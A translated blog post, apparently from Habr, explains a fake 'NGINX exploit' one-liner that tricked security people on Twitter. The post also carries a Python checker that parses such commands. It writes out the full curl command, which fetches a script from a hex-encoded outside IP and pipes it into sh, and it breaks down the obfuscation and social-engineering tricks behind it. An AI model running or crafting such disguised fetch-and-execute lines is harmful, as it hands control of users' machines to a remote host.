Translator's note:
TL;DR: Never pipe a file into sh or bash under any circumstances. It is a great way to lose control of your computer.
I want to share with you a short story about a joke PoC exploit that was created on May 31. It appeared promptly in response to news from
Having just finished work on a new obfuscation technique in curl, I quoted the original tweet and "leaked a working PoC" consisting of a single line of code that supposedly exploits the discovered vulnerability. Of course, this was complete nonsense. I assumed I would be exposed immediately, and that at best I would get a few retweets (oh well).
However, I did not anticipate what happened next. The popularity of my tweet soared. Surprisingly, at the moment (15:00 Moscow time on June 1) only a few people have noticed that it is a fake. Many people retweet it without checking it at all (not to mention admiring the lovely ASCII graphics it outputs).
Just look how beautiful it is!
While all these loops and colors are great, it is clear that people had to run the code on their own machine to see them. Fortunately, browsers work the same way, and combined with the fact that I did not want to get into legal trouble, the code buried in my site only made echo calls without trying to install or execute any additional code.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - more than just phishing
Safety and familiarity were a major part of this experiment. I think they are what led to its success. The command line clearly implies safety by referring to "127.0.0.1" (the well-known localhost). Localhost is considered safe, and the data on it never leaves your computer.
Familiarity was the second key SEE component of the experiment. Since the target audience consisted primarily of people familiar with the basics of computer security, it was important to craft the code so that parts of it looked familiar and well known (and therefore safe). Borrowing elements of old exploit concepts and combining them in an unusual way proved very successful.
Below is a detailed breakdown of the one-liner. Everything in this list is cosmetic in nature, and nothing in it is needed for the line to actually work.
Which components are actually necessary? They are -gsS, -O 0x0238f06a, |sh and the web server itself. The web server did not contain any malicious instructions; it simply served ASCII graphics using echo commands in the script contained in index.html. When a user entered the line with |sh in the middle, index.html was downloaded and executed. Fortunately, the maintainers of the web server had no ill intent.
- ../../../%00 - represents going beyond the directory;
- ngx_stream_module.so - the path to an arbitrary NGINX module;
- /bin/sh%00<'protocol:TCP' - supposedly we launch /bin/sh on the target machine and redirect its output to a TCP channel;
- -O 0x0238f06a#PLToffset - the secret ingredient, supplemented with #PLToffset so that it looks like a memory offset somehow contained in the PLT;
- |sh; - another important piece. We needed to redirect the output to sh/bash in order to execute the code coming from the attacking web server located at 0x0238f06a (2.56.240.x);
- nc /dev/tcp/localhost - a dummy in which netcat refers to /dev/tcp/localhost so that everything looks safe again. In reality it does nothing and is included in the line for beauty.
This concludes the breakdown of the one-line script and the discussion of the aspects of "socio-electronic engineering" (sophisticated phishing).
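A check a reader could run before pasting such a line, as an added example (not code from the original post): it tokenizes the command without executing it, lists the hosts each curl call actually names, decoding the numeric IPv4 spellings that inet_aton accepts, and reports whether curl's output is piped into a shell. The helper names and the simplification that every non-option word is a URL are assumptions of this sketch.

```python
import ipaddress
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# The one-liner from the article, reproduced as sample input (never executed).
ONE_LINER = (
    "curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?"
    "/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00"
    "<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost"
)

def decode_host(host):
    """Dotted quad for an inet_aton-style numeric host (hex/octal/decimal), else None."""
    nums = []
    for part in host.split("."):
        m = re.fullmatch(r"(0[xX][0-9a-fA-F]+)|(0[0-7]*)|([1-9][0-9]*)", part)
        if not m:
            return None
        nums.append(int(part, 16 if m[1] else 8 if m[2] else 10))
    *head, last = nums
    # The last part fills every remaining byte: "a" is 32 bits, "a.b" is 8 + 24, ...
    if len(nums) > 4 or any(n > 255 for n in head) or last >= 1 << 8 * (4 - len(head)):
        return None
    for i, n in enumerate(head):
        last |= n << 8 * (3 - i)
    return str(ipaddress.IPv4Address(last))

def host_of(word):
    """Host part of a curl URL argument (curl also accepts URLs without a scheme)."""
    rest = re.sub(r"^[A-Za-z][A-Za-z0-9+.-]*://", "", word)
    authority = re.split(r"[/?#]", rest, maxsplit=1)[0].rsplit("@", 1)[-1]
    return re.sub(r":\d+$", "", authority)

def analyze(cmdline):
    """Hosts named by each curl call, and whether curl's output is piped into a shell."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""  # keep "#PLToffset" inside its word
    hosts, piped, seg, after_curl_pipe = [], False, [], False
    for tok in list(lex) + [";"]:
        if tok not in {"|", ";", "&", "&&", "||"}:
            seg.append(tok)
            continue
        piped = piped or (after_curl_pipe and bool(seg) and seg[0] in SHELLS)
        is_curl = bool(seg) and seg[0] == "curl"
        if is_curl:  # assumption: every non-option word is a URL (true for -g -s -S -O)
            hosts += [(host_of(w), decode_host(host_of(w))) for p, w in zip(seg, seg[1:])
                      if not w.startswith(("-", "<", ">")) and not p.startswith(("<", ">"))]
        after_curl_pipe, seg = is_curl and tok == "|", []
    return {"hosts": hosts, "piped_to_shell": piped}
```

Calling `analyze(ONE_LINER)` shows that the word after `-O` is a second host outside localhost and that the download is fed straight into `sh`, which is exactly the part of the line that matters.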
Web Server Configuration and Countermeasures
Since the vast majority of my subscribers are infosec people/hackers, I decided to make the web server a little more resistant to displays of "interest" on their part, just so the guys would have something to do (and it would be fun to set up). I am not going to list all the traps here because the experiment is still ongoing, but here are a few things the server does:
- Actively monitors distribution attempts on certain social networks and substitutes various preview thumbnails to encourage the user to click on the link.
- Redirects Chrome/Mozilla/Safari/etc. to the Thugcrowd promotional video instead of showing the shell script.
- Watches for OBVIOUS signs of intrusion/blatant hacking, and then starts redirecting requests to NSA servers (ha!).
- Installs a Trojan, as well as a BIOS rootkit, on all computers whose users visit the host from a regular browser (just kidding!).
A small part of the countermeasures
In this case, my only goal was to learn some of Apache's features - in particular, the cool rules for redirecting requests - and I thought: why not?
NGINX Exploit (Real!)
Subscribe to
Source: www.habr.com